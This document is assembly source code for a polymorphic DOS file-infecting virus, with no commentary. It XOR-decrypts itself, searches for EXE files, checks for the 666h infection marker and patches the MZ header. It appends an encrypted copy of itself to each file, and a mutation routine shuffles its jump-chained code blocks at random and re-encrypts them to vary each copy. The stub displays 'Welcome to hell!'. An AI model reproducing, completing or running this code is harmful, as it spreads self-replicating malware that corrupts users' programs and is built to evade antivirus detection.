%NOSYMS
.386
assume cs:Xseg,ss:Sseg
Xseg segment use16
			mov ah,9
			lea dx,Mess1
			push cs
			pop ds
			int 21h
			mov ax,4c00h
			int 21h
Mess1:			db 'Welcome to hell!$'
Xseg ends
assume cs:Vseg
Vseg segment use16
;#CODESTART
GPSVAR_00000 EQU OFFSET GPS_00001-OFFSET GPS_00000 OR 40H
GPS_00000:
START: PUSHA
DB 0E9H, 0, 0
GPSVAR_00001 EQU OFFSET GPS_00002-OFFSET GPS_00001 OR 40H
GPS_00001:
MOV AX,DS
DB 0E9H, 0, 0
GPSVAR_00002 EQU OFFSET GPS_00003-OFFSET GPS_00002 OR 40H
GPS_00002:
ADD CS:[OLD_CS],AX
DB 0E9H, 0, 0
GPSVAR_00003 EQU OFFSET GPS_00004-OFFSET GPS_00003 OR 40H
GPS_00003:
ADD CS:[OLD_SS],AX
DB 0E9H, 0, 0
GPSVAR_00004 EQU OFFSET GPS_00005-OFFSET GPS_00004 OR 80H
GPS_00004:
CALL VIRMAIN 
DB 0E9H, 0, 0
GPSVAR_00005 EQU OFFSET GPS_00006-OFFSET GPS_00005 OR 40H
GPS_00005:
POPA
DB 0E9H, 0, 0
GPSVAR_00006 EQU OFFSET GPS_00007-OFFSET GPS_00006 OR 40H
GPS_00006:
CLI
DB 0E9H, 0, 0
GPSVAR_00007 EQU OFFSET GPS_00008-OFFSET GPS_00007 OR 40H
GPS_00007:
MOV SS,CS:[OLD_SS]
DB 0E9H, 0, 0
GPSVAR_00008 EQU OFFSET GPS_00009-OFFSET GPS_00008 OR 40H
GPS_00008:
MOV SP,CS:[OLD_SP]
DB 0E9H, 0, 0
GPSVAR_00009 EQU OFFSET GPS_00010-OFFSET GPS_00009 OR 40H
GPS_00009:
STI
DB 0E9H, 0, 0
GPSVAR_00010 EQU OFFSET GPS_00011-OFFSET GPS_00010
GPS_00010:
JMP DWORD PTR CS:[OLD_IP] 
VIRMAIN PROC NEAR 
GPSVAR_00011 EQU OFFSET GPS_00012-OFFSET GPS_00011 OR 40H
GPS_00011:
PUSH DS
DB 0E9H, 0, 0
GPSVAR_00012 EQU OFFSET GPS_00013-OFFSET GPS_00012 OR 40H
GPS_00012:
PUSH ES
DB 0E9H, 0, 0
GPSVAR_00013 EQU OFFSET GPS_00014-OFFSET GPS_00013 OR 40H
GPS_00013:
MOV AH,1AH
DB 0E9H, 0, 0
GPSVAR_00014 EQU OFFSET GPS_00015-OFFSET GPS_00014 OR 40H
GPS_00014:
LEA DX,[DTA]
DB 0E9H, 0, 0
GPSVAR_00015 EQU OFFSET GPS_00016-OFFSET GPS_00015 OR 40H
GPS_00015:
PUSH CS
DB 0E9H, 0, 0
GPSVAR_00016 EQU OFFSET GPS_00017-OFFSET GPS_00016 OR 40H
GPS_00016:
PUSH CS
DB 0E9H, 0, 0
GPSVAR_00017 EQU OFFSET GPS_00018-OFFSET GPS_00017 OR 40H
GPS_00017:
POP DS
DB 0E9H, 0, 0
GPSVAR_00018 EQU OFFSET GPS_00019-OFFSET GPS_00018 OR 40H
GPS_00018:
POP ES
DB 0E9H, 0, 0
GPSVAR_00019 EQU OFFSET GPS_00020-OFFSET GPS_00019 OR 40H
GPS_00019:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00020 EQU OFFSET GPS_00021-OFFSET GPS_00020 OR 80H
GPS_00020:
CALL RANDOMIZE 
DB 0E9H, 0, 0
GPSVAR_00021 EQU OFFSET GPS_00022-OFFSET GPS_00021 OR 40H
GPS_00021:
MOV CX,OFFSET CODE2-OFFSET XORKEY
DB 0E9H, 0, 0
GPSVAR_00022 EQU OFFSET GPS_00023-OFFSET GPS_00022 OR 40H
GPS_00022:
LEA SI,[XORKEY]
DB 0E9H, 0, 0
GPSVAR_00023 EQU OFFSET GPS_00024-OFFSET GPS_00023 OR 40H
GPS_00023:
MOV AL,DS:[SI]
DB 0E9H, 0, 0
GPSVAR_00024 EQU OFFSET GPS_00025-OFFSET GPS_00024 OR 40H
GPS_00024:
VM1: XOR DS:[SI],AL
DB 0E9H, 0, 0
GPSVAR_00025 EQU OFFSET GPS_00026-OFFSET GPS_00025 OR 40H
GPS_00025:
INC SI
DB 0E9H, 0, 0
GPSVAR_00026 EQU OFFSET GPS_00027-OFFSET GPS_00026 OR 80H
GPS_00026:
LOOP $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET VM1-$-2
GPSVAR_00027 EQU OFFSET GPS_00028-OFFSET GPS_00027 OR 40H
GPS_00027:
MOV AH,4EH
DB 0E9H, 0, 0
GPSVAR_00028 EQU OFFSET GPS_00029-OFFSET GPS_00028 OR 40H
GPS_00028:
MOV CX,63
DB 0E9H, 0, 0
GPSVAR_00029 EQU OFFSET GPS_00030-OFFSET GPS_00029 OR 40H
GPS_00029:
LEA DX,[EXE]
DB 0E9H, 0, 0
GPSVAR_00030 EQU OFFSET GPS_00031-OFFSET GPS_00030 OR 40H
GPS_00030:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00031 EQU OFFSET GPS_00032-OFFSET GPS_00031 OR 80H
GPS_00031:
VM2: JC $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET VM3-$-2
GPSVAR_00032 EQU OFFSET GPS_00033-OFFSET GPS_00032 OR 80H
GPS_00032:
CALL INFECT 
DB 0E9H, 0, 0
GPSVAR_00033 EQU OFFSET GPS_00034-OFFSET GPS_00033 OR 40H
GPS_00033:
MOV AH,4FH
DB 0E9H, 0, 0
GPSVAR_00034 EQU OFFSET GPS_00035-OFFSET GPS_00034 OR 40H
GPS_00034:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00035 EQU OFFSET GPS_00036-OFFSET GPS_00035 OR 40H
GPS_00035:
DB 0E9H
DW OFFSET VM2-$-2
GPSVAR_00036 EQU OFFSET GPS_00037-OFFSET GPS_00036 OR 40H
GPS_00036:
VM3: POP ES
DB 0E9H, 0, 0
GPSVAR_00037 EQU OFFSET GPS_00038-OFFSET GPS_00037 OR 40H
GPS_00037:
POP DS
DB 0E9H, 0, 0
GPSVAR_00038 EQU OFFSET GPS_00039-OFFSET GPS_00038 OR 40H
GPS_00038:
MOV AH,1AH
DB 0E9H, 0, 0
GPSVAR_00039 EQU OFFSET GPS_00040-OFFSET GPS_00039 OR 40H
GPS_00039:
MOV DX,80H
DB 0E9H, 0, 0
GPSVAR_00040 EQU OFFSET GPS_00041-OFFSET GPS_00040 OR 40H
GPS_00040:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00041 EQU OFFSET GPS_00042-OFFSET GPS_00041
GPS_00041:
RET 
VIRMAIN ENDP 
INFECT PROC NEAR 
GPSVAR_00042 EQU OFFSET GPS_00043-OFFSET GPS_00042 OR 40H
GPS_00042:
MOV AX,3D02H
DB 0E9H, 0, 0
GPSVAR_00043 EQU OFFSET GPS_00044-OFFSET GPS_00043 OR 40H
GPS_00043:
LEA DX,[DTA+1EH]
DB 0E9H, 0, 0
GPSVAR_00044 EQU OFFSET GPS_00045-OFFSET GPS_00044 OR 40H
GPS_00044:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00045 EQU OFFSET GPS_00046-OFFSET GPS_00045 OR 80H
GPS_00045:
JC $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET IN1-$-2
GPSVAR_00046 EQU OFFSET GPS_00047-OFFSET GPS_00046 OR 40H
GPS_00046:
MOV BX,AX
DB 0E9H, 0, 0
GPSVAR_00047 EQU OFFSET GPS_00048-OFFSET GPS_00047 OR 40H
GPS_00047:
MOV AH,3FH
DB 0E9H, 0, 0
GPSVAR_00048 EQU OFFSET GPS_00049-OFFSET GPS_00048 OR 40H
GPS_00048:
MOV CX,1CH
DB 0E9H, 0, 0
GPSVAR_00049 EQU OFFSET GPS_00050-OFFSET GPS_00049 OR 40H
GPS_00049:
LEA DX,[HEADER]
DB 0E9H, 0, 0
GPSVAR_00050 EQU OFFSET GPS_00051-OFFSET GPS_00050 OR 40H
GPS_00050:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00051 EQU OFFSET GPS_00052-OFFSET GPS_00051 OR 40H
GPS_00051:
CMP WORD PTR DS:[HEADER],'ZM' 
DB 0E9H, 0, 0
GPSVAR_00052 EQU OFFSET GPS_00053-OFFSET GPS_00052 OR 80H
GPS_00052:
JNE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET IN2-$-2
GPSVAR_00053 EQU OFFSET GPS_00054-OFFSET GPS_00053 OR 40H
GPS_00053:
CMP WORD PTR DS:[HEADER+12H],666H 
DB 0E9H, 0, 0
GPSVAR_00054 EQU OFFSET GPS_00055-OFFSET GPS_00054 OR 80H
GPS_00054:
JE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET IN2-$-2
GPSVAR_00055 EQU OFFSET GPS_00056-OFFSET GPS_00055 OR 40H
GPS_00055:
CMP WORD PTR DS:[HEADER+4],600 
DB 0E9H, 0, 0
GPSVAR_00056 EQU OFFSET GPS_00057-OFFSET GPS_00056 OR 80H
GPS_00056:
JA $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET IN2-$-2
GPSVAR_00057 EQU OFFSET GPS_00058-OFFSET GPS_00057 OR 40H
GPS_00057:
MOV AX,WORD PTR DS:[HEADER+0EH]
DB 0E9H, 0, 0
GPSVAR_00058 EQU OFFSET GPS_00059-OFFSET GPS_00058 OR 40H
GPS_00058:
ADD AX,10H
DB 0E9H, 0, 0
GPSVAR_00059 EQU OFFSET GPS_00060-OFFSET GPS_00059 OR 40H
GPS_00059:
MOV DS:[OLD_SS2],AX 
DB 0E9H, 0, 0
GPSVAR_00060 EQU OFFSET GPS_00061-OFFSET GPS_00060 OR 40H
GPS_00060:
MOV AX,WORD PTR DS:[HEADER+10H]
DB 0E9H, 0, 0
GPSVAR_00061 EQU OFFSET GPS_00062-OFFSET GPS_00061 OR 40H
GPS_00061:
MOV DS:[OLD_SP2],AX 
DB 0E9H, 0, 0
GPSVAR_00062 EQU OFFSET GPS_00063-OFFSET GPS_00062 OR 40H
GPS_00062:
MOV AX,WORD PTR DS:[HEADER+14H]
DB 0E9H, 0, 0
GPSVAR_00063 EQU OFFSET GPS_00064-OFFSET GPS_00063 OR 40H
GPS_00063:
MOV DS:[OLD_IP2],AX 
DB 0E9H, 0, 0
GPSVAR_00064 EQU OFFSET GPS_00065-OFFSET GPS_00064 OR 40H
GPS_00064:
MOV AX,WORD PTR DS:[HEADER+16H]
DB 0E9H, 0, 0
GPSVAR_00065 EQU OFFSET GPS_00066-OFFSET GPS_00065 OR 40H
GPS_00065:
ADD AX,10H
DB 0E9H, 0, 0
GPSVAR_00066 EQU OFFSET GPS_00067-OFFSET GPS_00066 OR 40H
GPS_00066:
MOV DS:[OLD_CS2],AX 
DB 0E9H, 0, 0
GPSVAR_00067 EQU OFFSET GPS_00068-OFFSET GPS_00067 OR 80H
GPS_00067:
CALL CREATECOPY 
DB 0E9H, 0, 0
GPSVAR_00068 EQU OFFSET GPS_00069-OFFSET GPS_00068 OR 40H
GPS_00068:
MOV WORD PTR DS:[HEADER+14H],AX 
DB 0E9H, 0, 0
GPSVAR_00069 EQU OFFSET GPS_00070-OFFSET GPS_00069 OR 40H
GPS_00069:
MOV AX,4202H
DB 0E9H, 0, 0
GPSVAR_00070 EQU OFFSET GPS_00071-OFFSET GPS_00070 OR 40H
GPS_00070:
XOR CX,CX
DB 0E9H, 0, 0
GPSVAR_00071 EQU OFFSET GPS_00072-OFFSET GPS_00071 OR 40H
GPS_00071:
XOR DX,DX
DB 0E9H, 0, 0
GPSVAR_00072 EQU OFFSET GPS_00073-OFFSET GPS_00072 OR 40H
GPS_00072:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00073 EQU OFFSET GPS_00074-OFFSET GPS_00073 OR 40H
GPS_00073:
ADD AX,15
DB 0E9H, 0, 0
GPSVAR_00074 EQU OFFSET GPS_00075-OFFSET GPS_00074 OR 40H
GPS_00074:
ADC DX,0
DB 0E9H, 0, 0
GPSVAR_00075 EQU OFFSET GPS_00076-OFFSET GPS_00075 OR 40H
GPS_00075:
MOV CX,16
DB 0E9H, 0, 0
GPSVAR_00076 EQU OFFSET GPS_00077-OFFSET GPS_00076 OR 40H
GPS_00076:
DIV CX
DB 0E9H, 0, 0
GPSVAR_00077 EQU OFFSET GPS_00078-OFFSET GPS_00077 OR 40H
GPS_00077:
MOV DX,AX
DB 0E9H, 0, 0
GPSVAR_00078 EQU OFFSET GPS_00079-OFFSET GPS_00078 OR 40H
GPS_00078:
SUB DX,WORD PTR DS:[HEADER+8]
DB 0E9H, 0, 0
GPSVAR_00079 EQU OFFSET GPS_00080-OFFSET GPS_00079 OR 40H
GPS_00079:
MOV WORD PTR DS:[HEADER+16H],DX 
DB 0E9H, 0, 0
GPSVAR_00080 EQU OFFSET GPS_00081-OFFSET GPS_00080 OR 40H
GPS_00080:
MUL CX
DB 0E9H, 0, 0
GPSVAR_00081 EQU OFFSET GPS_00082-OFFSET GPS_00081 OR 40H
GPS_00081:
MOV CX,DX
DB 0E9H, 0, 0
GPSVAR_00082 EQU OFFSET GPS_00083-OFFSET GPS_00082 OR 40H
GPS_00082:
MOV DX,AX
DB 0E9H, 0, 0
GPSVAR_00083 EQU OFFSET GPS_00084-OFFSET GPS_00083 OR 40H
GPS_00083:
MOV AX,4200H
DB 0E9H, 0, 0
GPSVAR_00084 EQU OFFSET GPS_00085-OFFSET GPS_00084 OR 40H
GPS_00084:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00085 EQU OFFSET GPS_00086-OFFSET GPS_00085 OR 40H
GPS_00085:
ADD AX,OFFSET CODE2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00086 EQU OFFSET GPS_00087-OFFSET GPS_00086 OR 40H
GPS_00086:
ADC DX,0 
DB 0E9H, 0, 0
GPSVAR_00087 EQU OFFSET GPS_00088-OFFSET GPS_00087 OR 40H
GPS_00087:
PUSH AX
DB 0E9H, 0, 0
GPSVAR_00088 EQU OFFSET GPS_00089-OFFSET GPS_00088 OR 40H
GPS_00088:
PUSH DX
DB 0E9H, 0, 0
GPSVAR_00089 EQU OFFSET GPS_00090-OFFSET GPS_00089 OR 40H
GPS_00089:
ADD AX,511
DB 0E9H, 0, 0
GPSVAR_00090 EQU OFFSET GPS_00091-OFFSET GPS_00090 OR 40H
GPS_00090:
ADC DX,0
DB 0E9H, 0, 0
GPSVAR_00091 EQU OFFSET GPS_00092-OFFSET GPS_00091 OR 40H
GPS_00091:
MOV CX,512
DB 0E9H, 0, 0
GPSVAR_00092 EQU OFFSET GPS_00093-OFFSET GPS_00092 OR 40H
GPS_00092:
DIV CX
DB 0E9H, 0, 0
GPSVAR_00093 EQU OFFSET GPS_00094-OFFSET GPS_00093 OR 40H
GPS_00093:
MOV WORD PTR DS:[HEADER+2],DX 
DB 0E9H, 0, 0
GPSVAR_00094 EQU OFFSET GPS_00095-OFFSET GPS_00094 OR 40H
GPS_00094:
MOV WORD PTR DS:[HEADER+4],AX 
DB 0E9H, 0, 0
GPSVAR_00095 EQU OFFSET GPS_00096-OFFSET GPS_00095 OR 40H
GPS_00095:
POP DX
DB 0E9H, 0, 0
GPSVAR_00096 EQU OFFSET GPS_00097-OFFSET GPS_00096 OR 40H
GPS_00096:
POP AX
DB 0E9H, 0, 0
GPSVAR_00097 EQU OFFSET GPS_00098-OFFSET GPS_00097 OR 40H
GPS_00097:
ADD AX,OFFSET DATAEND-OFFSET CODE2+15
DB 0E9H, 0, 0
GPSVAR_00098 EQU OFFSET GPS_00099-OFFSET GPS_00098 OR 40H
GPS_00098:
ADC DX,0
DB 0E9H, 0, 0
GPSVAR_00099 EQU OFFSET GPS_00100-OFFSET GPS_00099 OR 40H
GPS_00099:
MOV CX,16
DB 0E9H, 0, 0
GPSVAR_00100 EQU OFFSET GPS_00101-OFFSET GPS_00100 OR 40H
GPS_00100:
DIV CX
DB 0E9H, 0, 0
GPSVAR_00101 EQU OFFSET GPS_00102-OFFSET GPS_00101 OR 40H
GPS_00101:
SUB AX,WORD PTR DS:[HEADER+8]
DB 0E9H, 0, 0
GPSVAR_00102 EQU OFFSET GPS_00103-OFFSET GPS_00102 OR 40H
GPS_00102:
MOV WORD PTR DS:[HEADER+0EH],AX 
DB 0E9H, 0, 0
GPSVAR_00103 EQU OFFSET GPS_00104-OFFSET GPS_00103 OR 40H
GPS_00103:
MOV WORD PTR DS:[HEADER+10H],4096 
DB 0E9H, 0, 0
GPSVAR_00104 EQU OFFSET GPS_00105-OFFSET GPS_00104 OR 40H
GPS_00104:
MOV WORD PTR DS:[HEADER+12H],666H 
DB 0E9H, 0, 0
GPSVAR_00105 EQU OFFSET GPS_00106-OFFSET GPS_00105 OR 40H
GPS_00105:
MOV AH,40H
DB 0E9H, 0, 0
GPSVAR_00106 EQU OFFSET GPS_00107-OFFSET GPS_00106 OR 40H
GPS_00106:
MOV CX,OFFSET CODE2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00107 EQU OFFSET GPS_00108-OFFSET GPS_00107 OR 40H
GPS_00107:
LEA DX,[CODE2]
DB 0E9H, 0, 0
GPSVAR_00108 EQU OFFSET GPS_00109-OFFSET GPS_00108 OR 40H
GPS_00108:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00109 EQU OFFSET GPS_00110-OFFSET GPS_00109 OR 40H
GPS_00109:
MOV AX,4200H
DB 0E9H, 0, 0
GPSVAR_00110 EQU OFFSET GPS_00111-OFFSET GPS_00110 OR 40H
GPS_00110:
XOR CX,CX
DB 0E9H, 0, 0
GPSVAR_00111 EQU OFFSET GPS_00112-OFFSET GPS_00111 OR 40H
GPS_00111:
XOR DX,DX
DB 0E9H, 0, 0
GPSVAR_00112 EQU OFFSET GPS_00113-OFFSET GPS_00112 OR 40H
GPS_00112:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00113 EQU OFFSET GPS_00114-OFFSET GPS_00113 OR 40H
GPS_00113:
MOV AH,40H
DB 0E9H, 0, 0
GPSVAR_00114 EQU OFFSET GPS_00115-OFFSET GPS_00114 OR 40H
GPS_00114:
MOV CX,1CH
DB 0E9H, 0, 0
GPSVAR_00115 EQU OFFSET GPS_00116-OFFSET GPS_00115 OR 40H
GPS_00115:
LEA DX,[HEADER]
DB 0E9H, 0, 0
GPSVAR_00116 EQU OFFSET GPS_00117-OFFSET GPS_00116 OR 40H
GPS_00116:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00117 EQU OFFSET GPS_00118-OFFSET GPS_00117 OR 40H
GPS_00117:
IN2: MOV AH,3EH
DB 0E9H, 0, 0
GPSVAR_00118 EQU OFFSET GPS_00119-OFFSET GPS_00118 OR 40H
GPS_00118:
INT 21H 
DB 0E9H, 0, 0
GPSVAR_00119 EQU OFFSET GPS_00120-OFFSET GPS_00119
GPS_00119:
IN1: RET 
INFECT ENDP 
CREATECOPY PROC NEAR 
GPSVAR_00120 EQU OFFSET GPS_00121-OFFSET GPS_00120 OR 40H
GPS_00120:
PUSH BX
DB 0E9H, 0, 0
GPSVAR_00121 EQU OFFSET GPS_00122-OFFSET GPS_00121 OR 40H
GPS_00121:
MOV CX,OFFSET CODE2-OFFSET XORKEY
DB 0E9H, 0, 0
GPSVAR_00122 EQU OFFSET GPS_00123-OFFSET GPS_00122 OR 40H
GPS_00122:
LEA SI,[XORKEY]
DB 0E9H, 0, 0
GPSVAR_00123 EQU OFFSET GPS_00124-OFFSET GPS_00123 OR 40H
GPS_00123:
LEA DI,[XORKEY2]
DB 0E9H, 0, 0
GPSVAR_00124 EQU OFFSET GPS_00125-OFFSET GPS_00124 OR 40H
GPS_00124:
CLD
DB 0E9H, 0, 0
GPSVAR_00125 EQU OFFSET GPS_00126-OFFSET GPS_00125 OR 40H
GPS_00125:
REP MOVSB
DB 0E9H, 0, 0
GPSVAR_00126 EQU OFFSET GPS_00127-OFFSET GPS_00126 OR 40H
GPS_00126:
MOV CX,N*2
DB 0E9H, 0, 0
GPSVAR_00127 EQU OFFSET GPS_00128-OFFSET GPS_00127 OR 40H
GPS_00127:
CC1: MOV AX,N
DB 0E9H, 0, 0
GPSVAR_00128 EQU OFFSET GPS_00129-OFFSET GPS_00128 OR 80H
GPS_00128:
CALL RANDOM 
DB 0E9H, 0, 0
GPSVAR_00129 EQU OFFSET GPS_00130-OFFSET GPS_00129 OR 40H
GPS_00129:
MOV SI,AX
DB 0E9H, 0, 0
GPSVAR_00130 EQU OFFSET GPS_00131-OFFSET GPS_00130 OR 40H
GPS_00130:
SHL SI,1
DB 0E9H, 0, 0
GPSVAR_00131 EQU OFFSET GPS_00132-OFFSET GPS_00131 OR 40H
GPS_00131:
ADD SI,OFFSET BLOCKPOS2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00132 EQU OFFSET GPS_00133-OFFSET GPS_00132 OR 40H
GPS_00132:
MOV AX,N
DB 0E9H, 0, 0
GPSVAR_00133 EQU OFFSET GPS_00134-OFFSET GPS_00133 OR 80H
GPS_00133:
CALL RANDOM 
DB 0E9H, 0, 0
GPSVAR_00134 EQU OFFSET GPS_00135-OFFSET GPS_00134 OR 40H
GPS_00134:
MOV DI,AX
DB 0E9H, 0, 0
GPSVAR_00135 EQU OFFSET GPS_00136-OFFSET GPS_00135 OR 40H
GPS_00135:
SHL DI,1
DB 0E9H, 0, 0
GPSVAR_00136 EQU OFFSET GPS_00137-OFFSET GPS_00136 OR 40H
GPS_00136:
ADD DI,OFFSET BLOCKPOS2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00137 EQU OFFSET GPS_00138-OFFSET GPS_00137 OR 40H
GPS_00137:
PUSH WORD PTR DS:[SI]
DB 0E9H, 0, 0
GPSVAR_00138 EQU OFFSET GPS_00139-OFFSET GPS_00138 OR 40H
GPS_00138:
PUSH WORD PTR DS:[DI]
DB 0E9H, 0, 0
GPSVAR_00139 EQU OFFSET GPS_00140-OFFSET GPS_00139 OR 40H
GPS_00139:
POP WORD PTR DS:[SI]
DB 0E9H, 0, 0
GPSVAR_00140 EQU OFFSET GPS_00141-OFFSET GPS_00140 OR 40H
GPS_00140:
POP WORD PTR DS:[DI]
DB 0E9H, 0, 0
GPSVAR_00141 EQU OFFSET GPS_00142-OFFSET GPS_00141 OR 80H
GPS_00141:
LOOP $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC1-$-2
GPSVAR_00142 EQU OFFSET GPS_00143-OFFSET GPS_00142 OR 40H
GPS_00142:
LEA SI,[BLOCKPOS]
DB 0E9H, 0, 0
GPSVAR_00143 EQU OFFSET GPS_00144-OFFSET GPS_00143 OR 40H
GPS_00143:
LEA DI,[BLOCKOFS]
DB 0E9H, 0, 0
GPSVAR_00144 EQU OFFSET GPS_00145-OFFSET GPS_00144 OR 80H
GPS_00144:
CALL FINDOFFSETS 
DB 0E9H, 0, 0
GPSVAR_00145 EQU OFFSET GPS_00146-OFFSET GPS_00145 OR 40H
GPS_00145:
LEA SI,[BLOCKPOS2]
DB 0E9H, 0, 0
GPSVAR_00146 EQU OFFSET GPS_00147-OFFSET GPS_00146 OR 40H
GPS_00146:
LEA DI,[BLOCKOFS2]
DB 0E9H, 0, 0
GPSVAR_00147 EQU OFFSET GPS_00148-OFFSET GPS_00147 OR 80H
GPS_00147:
CALL FINDOFFSETS 
DB 0E9H, 0, 0
GPSVAR_00148 EQU OFFSET GPS_00149-OFFSET GPS_00148 OR 40H
GPS_00148:
XOR BX,BX
DB 0E9H, 0, 0
GPSVAR_00149 EQU OFFSET GPS_00150-OFFSET GPS_00149 OR 40H
GPS_00149:
CC2: MOV AL,DS:[BLOCKSIZE+BX]
DB 0E9H, 0, 0
GPSVAR_00150 EQU OFFSET GPS_00151-OFFSET GPS_00150 OR 40H
GPS_00150:
MOV CL,AL
DB 0E9H, 0, 0
GPSVAR_00151 EQU OFFSET GPS_00152-OFFSET GPS_00151 OR 40H
GPS_00151:
SHR AL,6
DB 0E9H, 0, 0
GPSVAR_00152 EQU OFFSET GPS_00153-OFFSET GPS_00152 OR 40H
GPS_00152:
AND CX,111111B
DB 0E9H, 0, 0
GPSVAR_00153 EQU OFFSET GPS_00154-OFFSET GPS_00153 OR 40H
GPS_00153:
MOV SI,BX
DB 0E9H, 0, 0
GPSVAR_00154 EQU OFFSET GPS_00155-OFFSET GPS_00154 OR 40H
GPS_00154:
SHL SI,1
DB 0E9H, 0, 0
GPSVAR_00155 EQU OFFSET GPS_00156-OFFSET GPS_00155 OR 40H
GPS_00155:
MOV DI,DS:[BLOCKOFS2+SI]
DB 0E9H, 0, 0
GPSVAR_00156 EQU OFFSET GPS_00157-OFFSET GPS_00156 OR 40H
GPS_00156:
ADD DI,OFFSET CODE2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00157 EQU OFFSET GPS_00158-OFFSET GPS_00157 OR 40H
GPS_00157:
MOV SI,DS:[BLOCKOFS+SI]
DB 0E9H, 0, 0
GPSVAR_00158 EQU OFFSET GPS_00159-OFFSET GPS_00158 OR 40H
GPS_00158:
REP MOVSB
DB 0E9H, 0, 0
GPSVAR_00159 EQU OFFSET GPS_00160-OFFSET GPS_00159 OR 40H
GPS_00159:
CMP AL,0 
DB 0E9H, 0, 0
GPSVAR_00160 EQU OFFSET GPS_00161-OFFSET GPS_00160 OR 80H
GPS_00160:
JE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC3-$-2
GPSVAR_00161 EQU OFFSET GPS_00162-OFFSET GPS_00161 OR 40H
GPS_00161:
CMP AL,1 
DB 0E9H, 0, 0
GPSVAR_00162 EQU OFFSET GPS_00163-OFFSET GPS_00162 OR 80H
GPS_00162:
JE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC4-$-2
GPSVAR_00163 EQU OFFSET GPS_00164-OFFSET GPS_00163 OR 40H
GPS_00163:
MOV AX,DS:[SI-5]
DB 0E9H, 0, 0
GPSVAR_00164 EQU OFFSET GPS_00165-OFFSET GPS_00164 OR 40H
GPS_00164:
ADD AX,SI
DB 0E9H, 0, 0
GPSVAR_00165 EQU OFFSET GPS_00166-OFFSET GPS_00165 OR 40H
GPS_00165:
SUB AX,3
DB 0E9H, 0, 0
GPSVAR_00166 EQU OFFSET GPS_00167-OFFSET GPS_00166 OR 80H
GPS_00166:
CALL FINDTARGET 
DB 0E9H, 0, 0
GPSVAR_00167 EQU OFFSET GPS_00168-OFFSET GPS_00167 OR 40H
GPS_00167:
SUB AX,DI
DB 0E9H, 0, 0
GPSVAR_00168 EQU OFFSET GPS_00169-OFFSET GPS_00168 OR 40H
GPS_00168:
ADD AX,3
DB 0E9H, 0, 0
GPSVAR_00169 EQU OFFSET GPS_00170-OFFSET GPS_00169 OR 40H
GPS_00169:
MOV DS:[DI-5],AX
DB 0E9H, 0, 0
GPSVAR_00170 EQU OFFSET GPS_00171-OFFSET GPS_00170 OR 40H
GPS_00170:
CC4: MOV AX,DS:[SI-2]
DB 0E9H, 0, 0
GPSVAR_00171 EQU OFFSET GPS_00172-OFFSET GPS_00171 OR 40H
GPS_00171:
ADD AX,SI
DB 0E9H, 0, 0
GPSVAR_00172 EQU OFFSET GPS_00173-OFFSET GPS_00172 OR 80H
GPS_00172:
CALL FINDTARGET 
DB 0E9H, 0, 0
GPSVAR_00173 EQU OFFSET GPS_00174-OFFSET GPS_00173 OR 40H
GPS_00173:
SUB AX,DI
DB 0E9H, 0, 0
GPSVAR_00174 EQU OFFSET GPS_00175-OFFSET GPS_00174 OR 40H
GPS_00174:
MOV DS:[DI-2],AX
DB 0E9H, 0, 0
GPSVAR_00175 EQU OFFSET GPS_00176-OFFSET GPS_00175 OR 40H
GPS_00175:
CC3: INC BX
DB 0E9H, 0, 0
GPSVAR_00176 EQU OFFSET GPS_00177-OFFSET GPS_00176 OR 40H
GPS_00176:
CMP BX,N
DB 0E9H, 0, 0
GPSVAR_00177 EQU OFFSET GPS_00178-OFFSET GPS_00177 OR 80H
GPS_00177:
JB $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC2-$-2
GPSVAR_00178 EQU OFFSET GPS_00179-OFFSET GPS_00178 OR 40H
GPS_00178:
MOV BX,DS:[BLOCKOFS2]
DB 0E9H, 0, 0
GPSVAR_00179 EQU OFFSET GPS_00180-OFFSET GPS_00179 OR 40H
GPS_00179:
CC5: MOV AX,256
DB 0E9H, 0, 0
GPSVAR_00180 EQU OFFSET GPS_00181-OFFSET GPS_00180 OR 80H
GPS_00180:
CALL RANDOM 
DB 0E9H, 0, 0
GPSVAR_00181 EQU OFFSET GPS_00182-OFFSET GPS_00181 OR 40H
GPS_00181:
OR AX,AX
DB 0E9H, 0, 0
GPSVAR_00182 EQU OFFSET GPS_00183-OFFSET GPS_00182 OR 80H
GPS_00182:
JZ $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC5-$-2
GPSVAR_00183 EQU OFFSET GPS_00184-OFFSET GPS_00183 OR 40H
GPS_00183:
MOV CX,OFFSET CODE2-OFFSET XORKEY
DB 0E9H, 0, 0
GPSVAR_00184 EQU OFFSET GPS_00185-OFFSET GPS_00184 OR 40H
GPS_00184:
LEA SI,[XORKEY2]
DB 0E9H, 0, 0
GPSVAR_00185 EQU OFFSET GPS_00186-OFFSET GPS_00185 OR 40H
GPS_00185:
CC6: XOR DS:[SI],AL
DB 0E9H, 0, 0
GPSVAR_00186 EQU OFFSET GPS_00187-OFFSET GPS_00186 OR 40H
GPS_00186:
INC SI
DB 0E9H, 0, 0
GPSVAR_00187 EQU OFFSET GPS_00188-OFFSET GPS_00187 OR 80H
GPS_00187:
LOOP $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET CC6-$-2
